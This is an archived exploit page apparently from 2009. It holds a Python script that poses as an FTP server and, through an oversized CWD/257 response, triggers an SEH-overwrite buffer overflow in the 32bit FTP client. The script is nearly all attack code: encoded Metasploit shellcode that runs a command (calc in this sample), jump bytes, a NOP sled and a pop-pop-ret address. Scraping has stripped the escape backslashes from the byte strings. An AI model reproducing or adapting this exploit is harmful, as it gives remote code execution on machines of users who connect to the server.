Home / os / win10

32bitcwd-overwrite.txt

Posted on 05 May 2009

#!/usr/bin/python # _ _ _ __ _ _ _ #| || | (_) ___ / | |__ | | | #| __ | | | (_-< | () | | / / |_ _| #|_||_| |_| /__/ \__/ |_\_ |_| # #[*] Bug : 32bit FTP (09.04.24) (CWD Response) Universal Seh Overwrite Exploit #[*] Refer : http://www.milw0rm.com/exploits/8611 #[*] Tested on : Xp sp3 (EN)(VB) #[*] Exploited by : His0k4 #[*] Greetings : All friends & muslims HaCkErs (DZ),Algerians Elites,snakespc.com #[*] Serra7 Merra7 koulchi mderra7 :p from socket import * # win32_exec - EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com shellcode=( "xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49" "x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36" "x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34" "x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41" "x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4ax4ex46x54" "x42x30x42x30x42x30x4bx48x45x54x4ex43x4bx48x4ex57" "x45x30x4ax47x41x30x4fx4ex4bx58x4fx54x4ax31x4bx38" "x4fx35x42x52x41x30x4bx4ex49x34x4bx58x46x33x4bx38" "x41x50x50x4ex41x33x42x4cx49x59x4ex4ax46x38x42x4c" "x46x47x47x50x41x4cx4cx4cx4dx50x41x50x44x4cx4bx4e" "x46x4fx4bx33x46x55x46x52x46x30x45x57x45x4ex4bx58" "x4fx45x46x52x41x50x4bx4ex48x56x4bx38x4ex30x4bx54" "x4bx38x4fx55x4ex31x41x50x4bx4ex4bx58x4ex31x4bx58" "x41x30x4bx4ex49x58x4ex35x46x32x46x30x43x4cx41x53" "x42x4cx46x46x4bx58x42x54x42x33x45x38x42x4cx4ax57" "x4ex30x4bx48x42x44x4ex50x4bx58x42x47x4ex31x4dx4a" "x4bx58x4ax56x4ax30x4bx4ex49x30x4bx58x42x38x42x4b" "x42x30x42x50x42x30x4bx58x4ax36x4ex53x4fx45x41x53" "x48x4fx42x56x48x45x49x58x4ax4fx43x48x42x4cx4bx47" "x42x35x4ax36x42x4fx4cx38x46x30x4fx55x4ax46x4ax59" "x50x4fx4cx48x50x30x47x35x4fx4fx47x4ex43x36x41x56" "x4ex46x43x46x42x50x5a") buffer = 'x41'*4335 buffer += shellcode buffer += 'xE9xA4xFExFFxFF' # nro7o nro7o lel shellcode nro7o :p buffer += 'x90'*49 buffer += 'x74xC8x90x90' # to the end and its a new Beginning ;) buffer += 'x30x14x45x00' #universal pop-pop-ret 32bitftp.exe s = socket(AF_INET, SOCK_STREAM) s.bind(("0.0.0.0", 21)) s.listen(1) print "[+] Listening on [FTP] 21" c, addr = s.accept() print "[+] Connection accepted from: %s" % (addr[0]) c.send("220 chtawala chtakayen ") c.recv(1024) c.send("331 pwd please ") c.recv(1024) c.send("230 OK ") c.recv(1024) c.send("250 CWD command successful. ") c.recv(1024) c.send("257 "+buffer+" is current directory.") c.close() raw_input("[+] Done, press enter to quit") s.close()

 

TOP

Malware :